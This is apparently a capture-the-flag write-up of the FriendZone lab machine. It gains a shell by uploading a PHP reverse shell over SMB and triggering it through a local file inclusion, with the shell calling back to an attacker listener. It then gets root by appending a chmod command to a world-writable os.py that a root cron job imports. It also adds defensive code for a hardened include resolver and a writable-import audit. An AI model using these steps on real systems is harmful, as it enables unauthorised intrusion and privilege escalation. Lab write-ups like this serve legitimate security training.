hr.friendzone.red has address 127.0.0.1
uploads.friendzone.red has address 127.0.0.1
Looking around
I added the newly discovered subdomains to /etc/hosts
as well.
(hr.friendzone.red returned Not Found.)
uploads.friendzone.red
administrator1.friendzone.red
Logging in with the admin:WORKWORKHhallelujah@# obtained earlier from the general share
succeeds.
gobuster
kali@kali:~$ gobuster dir -u https://administrator1.friendzone.red/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -k -t 40 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://administrator1.friendzone.red/
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
2020/06/21 19:32:45 Starting gobuster
===============================================================
/login.php (Status: 200)
/images (Status: 301)
/dashboard.php (Status: 200)
/timestamp.php (Status: 200)
Let's access /dashboard.php.
I tried the default parameters (image_id and pagename) that the page suggests.
An irritating image came up.
The default pagename value, timestamp, seems to point at the timestamp.php that gobuster found, so pagename is probably fed to a PHP include with .php appended. That looks like a possible LFI.
Finding somewhere to upload a file for the LFI
My first candidate was uploads.friendzone.red, but I couldn't work out where the uploaded files ended up. While puzzling over that I realized I don't need uploads.friendzone.red at all: the Development share is anonymously writable and the share enumeration above already gave its on-disk path (/etc/Development), so I can drop the file over SMB instead.
Transfer over SMB
Upload pentestmonkey's php-reverse-shell over SMB: https://github.com/pentestmonkey/php-reverse-shell (set $ip and $port in the script to your listener first; here 10.10.14.25 and 1212).
kali@kali:~$ smbclient //10.10.10.123/Development
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> put php-reverse-shell.php
putting file php-reverse-shell.php as \php-reverse-shell.php (6.9 kb/s) (average 6.9 kb/s)
smb: \> ls
. D 0 Sun Jun 21 20:02:08 2020
.. D 0 Wed Jan 23 16:51:02 2019
php-reverse-shell.php A 5493 Sun Jun 21 20:04:58 2020
9221460 blocks of size 1024. 6373116 blocks available
smb: \> exit
Now, with a listener running, request the following URL (the .php extension is left off because the include appends it):
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/php-reverse-shell
...and we get a shell as www-data.
kali@kali:~$ nc -lnvp 1212
listening on [any] 1212 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.123] 58082
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
03:05:57 up 5:44, 0 users, load average: 1.03, 0.65, 0.38
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@FriendZone:/$
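The foothold above rests on two facts: the pagename parameter is fed to an include that appends .php, and the Development share is anonymously writable at a known path. The Python below is an added example, not the box's PHP and not the author's code. It models the include logic to show why the payload omits the extension and why an absolute pagename escapes the web root, and puts a hardened resolver (allowlist plus realpath containment) beside it. The web root /var/www/admin is an assumption made for the example.

```python
import os

WEBROOT = "/var/www/admin"  # assumed web root for administrator1; not taken from the box


def lfi_pagename(share_path, filename):
    """Build the pagename value for a file dropped on a writable share.
    The include appends ".php" itself, so the extension must be left off."""
    name = filename[:-4] if filename.endswith(".php") else filename
    return f"{share_path.rstrip('/')}/{name}"


def vulnerable_resolve(webroot, pagename):
    """Model of dashboard.php's behaviour as inferred from the URL above: the
    user-controlled pagename gets ".php" appended and is included verbatim.
    os.path.join discards webroot when the second component is absolute, which
    is exactly how an absolute pagename escapes the web root."""
    return os.path.join(webroot, pagename + ".php")


def safe_resolve(webroot, pagename, allowed=frozenset({"timestamp"})):
    """Hardened resolver. Returns the file to include, or None if rejected.
    Two independent checks: an allowlist of page names (pass allowed=None to
    exercise the containment check alone) and a realpath containment check
    that defeats absolute paths, ../ traversal and symlinks pointing outside."""
    if allowed is not None and pagename not in allowed:
        return None
    root = os.path.realpath(webroot)
    target = os.path.realpath(os.path.join(root, pagename + ".php"))
    if os.path.commonpath([root, target]) != root:
        return None
    return target


if __name__ == "__main__":
    payload = lfi_pagename("/etc/Development", "php-reverse-shell.php")
    print("pagename =", payload)
    print("vulnerable include loads:", vulnerable_resolve(WEBROOT, payload))
    print("hardened include loads:", safe_resolve(WEBROOT, payload, allowed=None))
```

Note that the allowlist alone would already have stopped this attack; the containment check is defense in depth for the case where page names have to come from user input.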
pspy
www-data@FriendZone:/$ ./tmp/pspy64 -i 1000
./tmp/pspy64 -i 1000
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 1s and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/06/22 03:28:57 CMD: UID=0 PID=98 |
2020/06/22 03:28:57 CMD: UID=0 PID=9 |
2020/06/22 03:28:57 CMD: UID=0 PID=89 |
2020/06/22 03:28:57 CMD: UID=107 PID=861 | /usr/sbin/exim4 -bd -q30m
2020/06/22 03:28:57 CMD: UID=0 PID=854 | /usr/sbin/smbd --foreground --no-process-group
2020/06/22 03:28:57 CMD: UID=0 PID=852 | /usr/sbin/smbd --foreground --no-process-group
2020/06/22 03:28:57 CMD: UID=0 PID=851 | /usr/sbin/smbd --foreground --no-process-group
2020/06/22 03:28:57 CMD: UID=0 PID=85 |
2020/06/22 03:28:57 CMD: UID=0 PID=82 |
2020/06/22 03:28:57 CMD: UID=0 PID=81 |
2020/06/22 03:28:57 CMD: UID=0 PID=80 |
2020/06/22 03:28:57 CMD: UID=0 PID=8 |
2020/06/22 03:28:57 CMD: UID=0 PID=79 |
2020/06/22 03:28:57 CMD: UID=0 PID=78 |
2020/06/22 03:28:57 CMD: UID=0 PID=77 |
2020/06/22 03:28:57 CMD: UID=0 PID=726 | /usr/sbin/smbd --foreground --no-process-group
2020/06/22 03:28:57 CMD: UID=0 PID=7 |
2020/06/22 03:28:57 CMD: UID=0 PID=6 |
2020/06/22 03:28:57 CMD: UID=33 PID=5740 | ./tmp/pspy64 -i 1000
2020/06/22 03:28:57 CMD: UID=33 PID=5737 | /bin/bash
2020/06/22 03:28:57 CMD: UID=33 PID=5736 | python3 -c import pty; pty.spawn("/bin/bash")
2020/06/22 03:28:57 CMD: UID=33 PID=5735 | /bin/sh -i
2020/06/22 03:28:57 CMD: UID=0 PID=5733 |
2020/06/22 03:28:57 CMD: UID=0 PID=5732 |
2020/06/22 03:28:57 CMD: UID=33 PID=5729 | sh -c uname -a; w; id; /bin/sh -i
2020/06/22 03:28:57 CMD: UID=0 PID=572 | /usr/sbin/nmbd --foreground --no-process-group
2020/06/22 03:28:57 CMD: UID=0 PID=566 | /usr/sbin/apache2 -k start
2020/06/22 03:28:57 CMD: UID=0 PID=5647 |
2020/06/22 03:28:57 CMD: UID=0 PID=564 | /sbin/agetty -o -p -- \u --noclear tty1 linux
2020/06/22 03:28:57 CMD: UID=0 PID=5639 |
2020/06/22 03:28:57 CMD: UID=0 PID=562 | /usr/sbin/sshd -D
2020/06/22 03:28:57 CMD: UID=33 PID=5531 | /usr/sbin/apache2 -k start
2020/06/22 03:28:57 CMD: UID=0 PID=550 | /usr/sbin/vsftpd /etc/vsftpd.conf
2020/06/22 03:28:57 CMD: UID=33 PID=5497 | /usr/sbin/apache2 -k start
2020/06/22 03:28:57 CMD: UID=33 PID=5484 | /usr/sbin/apache2 -k start
2020/06/22 03:28:57 CMD: UID=33 PID=5481 | /usr/sbin/apache2 -k start
2020/06/22 03:28:57 CMD: UID=0 PID=5473 |
2020/06/22 03:28:57 CMD: UID=33 PID=5464 | /usr/sbin/apache2 -k start
2020/06/22 03:28:57 CMD: UID=33 PID=5416 | /usr/sbin/apache2 -k start
2020/06/22 03:28:57 CMD: UID=33 PID=5415 | /usr/sbin/apache2 -k start
2020/06/22 03:28:57 CMD: UID=109 PID=541 | /usr/sbin/named -f -4 -u bind
2020/06/22 03:28:57 CMD: UID=33 PID=5383 | /usr/sbin/apache2 -k start
2020/06/22 03:28:57 CMD: UID=33 PID=5364 | /usr/sbin/apache2 -k start
2020/06/22 03:28:57 CMD: UID=33 PID=5351 | /usr/sbin/apache2 -k start
2020/06/22 03:28:57 CMD: UID=33 PID=5320 | /usr/sbin/apache2 -k start
2020/06/22 03:28:57 CMD: UID=0 PID=4 |
2020/06/22 03:28:57 CMD: UID=0 PID=391 | /usr/lib/accountsservice/accounts-daemon
2020/06/22 03:28:57 CMD: UID=0 PID=390 | /usr/sbin/cron -f
2020/06/22 03:28:57 CMD: UID=102 PID=382 | /usr/sbin/rsyslogd -n
2020/06/22 03:28:57 CMD: UID=0 PID=381 | /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
2020/06/22 03:28:57 CMD: UID=0 PID=379 | /lib/systemd/systemd-logind
2020/06/22 03:28:57 CMD: UID=0 PID=378 | /usr/bin/VGAuthService
2020/06/22 03:28:57 CMD: UID=103 PID=377 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2020/06/22 03:28:57 CMD: UID=0 PID=35 |
2020/06/22 03:28:57 CMD: UID=0 PID=34 |
2020/06/22 03:28:57 CMD: UID=0 PID=32 |
2020/06/22 03:28:57 CMD: UID=62583 PID=314 | /lib/systemd/systemd-timesyncd
2020/06/22 03:28:57 CMD: UID=101 PID=313 | /lib/systemd/systemd-resolved
2020/06/22 03:28:57 CMD: UID=0 PID=30 |
2020/06/22 03:28:57 CMD: UID=0 PID=29 |
2020/06/22 03:28:57 CMD: UID=0 PID=28 |
2020/06/22 03:28:57 CMD: UID=0 PID=27 |
2020/06/22 03:28:57 CMD: UID=0 PID=26 |
2020/06/22 03:28:57 CMD: UID=100 PID=254 | /lib/systemd/systemd-networkd
2020/06/22 03:28:57 CMD: UID=0 PID=252 | /lib/systemd/systemd-udevd
2020/06/22 03:28:57 CMD: UID=0 PID=25 |
2020/06/22 03:28:57 CMD: UID=0 PID=24 |
2020/06/22 03:28:57 CMD: UID=0 PID=233 | /lib/systemd/systemd-journald
2020/06/22 03:28:57 CMD: UID=0 PID=230 | /usr/bin/vmtoolsd
2020/06/22 03:28:57 CMD: UID=0 PID=23 |
2020/06/22 03:28:57 CMD: UID=0 PID=22 |
2020/06/22 03:28:57 CMD: UID=0 PID=21 |
2020/06/22 03:28:57 CMD: UID=0 PID=20 |
2020/06/22 03:28:57 CMD: UID=0 PID=2 |
2020/06/22 03:28:57 CMD: UID=0 PID=195 |
2020/06/22 03:28:57 CMD: UID=0 PID=194 |
2020/06/22 03:28:57 CMD: UID=0 PID=19 |
2020/06/22 03:28:57 CMD: UID=0 PID=18 |
2020/06/22 03:28:57 CMD: UID=0 PID=173 |
2020/06/22 03:28:57 CMD: UID=0 PID=172 |
2020/06/22 03:28:57 CMD: UID=0 PID=171 |
2020/06/22 03:28:57 CMD: UID=0 PID=17 |
2020/06/22 03:28:57 CMD: UID=0 PID=169 |
2020/06/22 03:28:57 CMD: UID=0 PID=168 |
2020/06/22 03:28:57 CMD: UID=0 PID=167 |
2020/06/22 03:28:57 CMD: UID=0 PID=16 |
2020/06/22 03:28:57 CMD: UID=0 PID=15 |
2020/06/22 03:28:57 CMD: UID=0 PID=14 |
2020/06/22 03:28:57 CMD: UID=0 PID=13 |
2020/06/22 03:28:57 CMD: UID=0 PID=12 |
2020/06/22 03:28:57 CMD: UID=0 PID=115 |
2020/06/22 03:28:57 CMD: UID=0 PID=11 |
2020/06/22 03:28:57 CMD: UID=0 PID=10 |
2020/06/22 03:28:57 CMD: UID=0 PID=1 | /sbin/init splash
2020/06/22 03:30:01 CMD: UID=0 PID=5750 | /bin/sh -c /opt/server_admin/reporter.py
2020/06/22 03:30:01 CMD: UID=0 PID=5749 | /bin/sh -c /opt/server_admin/reporter.py
2020/06/22 03:30:01 CMD: UID=0 PID=5748 | /usr/sbin/CRON -f
Let's take a look at /bin/sh -c /opt/server_admin/reporter.py, which cron runs as root (UID=0).
www-data@FriendZone:/$ cat /opt/server_admin/reporter.py
cat /opt/server_admin/reporter.py
#!/usr/bin/python
import os
to_address = "[email protected]"
from_address = "[email protected]"
print "[+] Trying to send email to %s"%to_address
#command = ''' mailsend -to [email protected] -from [email protected] -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''
#os.system(command)
# I need to edit the script later
# Sam ~ python developer
www-data@FriendZone:/$ ls -la /opt/server_admin/reporter.py
ls -la /opt/server_admin/reporter.py
-rwxr--r-- 1 root root 424 Jan 16 2019 /opt/server_admin/reporter.py
It does not look like we can modify it. After staring at it for a while, though:
www-data@FriendZone:/$ ls -la /usr/lib/python2.7/os.py
ls -la /usr/lib/python2.7/os.py
-rwxrwxrwx 1 root root 25910 Jan 15 2019 /usr/lib/python2.7/os.py
However, the os.py module that the script imports is writable by everyone.
I wasn't sure whether merely being imported was enough for the code to run, but I tried the following:
www-data@FriendZone:/$ echo "system('chmod 777 /root')" >> /usr/lib/python2.7/os.py
<'chmod 777 /root')" >> /usr/lib/python2.7/os.py
This appends a line that changes the permissions of /root; it will run as root the next time the cron job imports os.
www-data@FriendZone:/$ ls -la
ls -la
total 434908
drwxr-xr-x 22 root root 4096 Oct 5 2018 .
drwxr-xr-x 22 root root 4096 Oct 5 2018 ..
drwxr-xr-x 2 root root 4096 Oct 5 2018 bin
drwxr-xr-x 3 root root 4096 Oct 5 2018 boot
drwxr-xr-x 18 root root 3880 Jun 21 21:21 dev
drwxr-xr-x 90 root root 4096 Jan 23 2019 etc
drwxr-xr-x 3 root root 4096 Oct 5 2018 home
lrwxrwxrwx 1 root root 33 Oct 5 2018 initrd.img -> boot/initrd.img-4.15.0-36-generic
lrwxrwxrwx 1 root root 33 Oct 5 2018 initrd.img.old -> boot/initrd.img-4.15.0-36-generic
drwxr-xr-x 18 root root 4096 Jan 23 2019 lib
drwxr-xr-x 2 root root 4096 Oct 5 2018 lib64
drwx------ 2 root root 16384 Oct 5 2018 lost+found
drwxr-xr-x 2 root root 4096 Oct 5 2018 media
drwxr-xr-x 2 root root 4096 Oct 5 2018 mnt
drwxr-xr-x 3 root root 4096 Oct 6 2018 opt
dr-xr-xr-x 102 root root 0 Jun 21 21:21 proc
drwxrwxrwx 6 root root 4096 Jan 24 2019 root
drwxr-xr-x 24 root root 640 Jun 21 21:21 run
drwxr-xr-x 2 root root 4096 Jan 23 2019 sbin
drwxr-xr-x 3 root root 4096 Oct 5 2018 srv
-rw------- 1 root root 445255680 Oct 5 2018 swapfile
dr-xr-xr-x 13 root root 0 Jun 22 03:34 sys
drwxrwxrwt 2 root root 4096 Jun 22 03:13 tmp
drwxr-xr-x 10 root root 4096 Oct 5 2018 usr
drwxr-xr-x 12 root root 4096 Oct 6 2018 var
lrwxrwxrwx 1 root root 30 Oct 5 2018 vmlinuz -> boot/vmlinuz-4.15.0-36-generic
lrwxrwxrwx 1 root root 30 Oct 5 2018 vmlinuz.old -> boot/vmlinuz-4.15.0-36-generic
www-data@FriendZone:/$ cd root
cd root
www-data@FriendZone:/root$ cat root.txt
After waiting a while for the cron job to fire, /root became accessible.
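As an added defensive check, not part of the original writeup: the script below audits a privileged Python script for the exact weakness used here, an imported module file (or its directory) that non-root users can write to. The demo() fixture, its file names and contents are constructed for the example.

```python
import os
import re
import stat
import tempfile
from importlib.machinery import PathFinder

# Regex rather than ast so Python 2 scripts such as reporter.py parse from Python 3.
IMPORT_RE = re.compile(r"^\s*(?:import|from)\s+([A-Za-z_][\w.]*)", re.MULTILINE)

def imported_modules(source):
    """Sorted top-level module names the script source imports."""
    return sorted({m.split(".")[0] for m in IMPORT_RE.findall(source)})

def resolve_module_file(name, search_path):
    """File an import of `name` would load from search_path, or None (builtins, missing)."""
    spec = PathFinder.find_spec(name, search_path)
    return spec.origin if spec and spec.origin and os.path.isfile(spec.origin) else None

def writable_by_non_owner(path):
    """True if the file or its directory is group- or world-writable."""
    # On a real host also require os.stat(path).st_uid == 0; skipped so the
    # constructed fixture behaves the same for whoever runs it.
    loose = stat.S_IWGRP | stat.S_IWOTH
    return any(os.stat(p).st_mode & loose for p in (path, os.path.dirname(path)))

def audit_script(script_path, search_path):
    """{module: file} for each import the script makes that non-root users can edit."""
    with open(script_path) as fh:
        names = imported_modules(fh.read())
    found = {}
    for name in names:
        mod_file = resolve_module_file(name, search_path)
        if mod_file and writable_by_non_owner(mod_file):
            found[name] = mod_file
    return found

def demo():
    """Constructed fixture mirroring the finding: a 777 os.py beside a 644 module."""
    tmp = tempfile.mkdtemp()
    lib = os.path.join(tmp, "lib")
    os.mkdir(lib, 0o755)
    for fname, mode in (("os.py", 0o777), ("helper.py", 0o644)):
        with open(os.path.join(lib, fname), "w") as fh:
            fh.write("# constructed stand-in module\n")
        os.chmod(os.path.join(lib, fname), mode)
    script = os.path.join(tmp, "reporter.py")
    with open(script, "w") as fh:
        fh.write('#!/usr/bin/python\nimport os\nimport helper\nprint "[+] hi"\n')
    return audit_script(script, [lib])
```

Run demo() and only the writable os.py is reported; pointing audit_script at the real /opt/server_admin/reporter.py with search_path set to the interpreter's library directories gives the same check on a live host.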
Closing thoughts
It was a really good machine: it requires a lot of different enumeration and there are many possibilities to consider.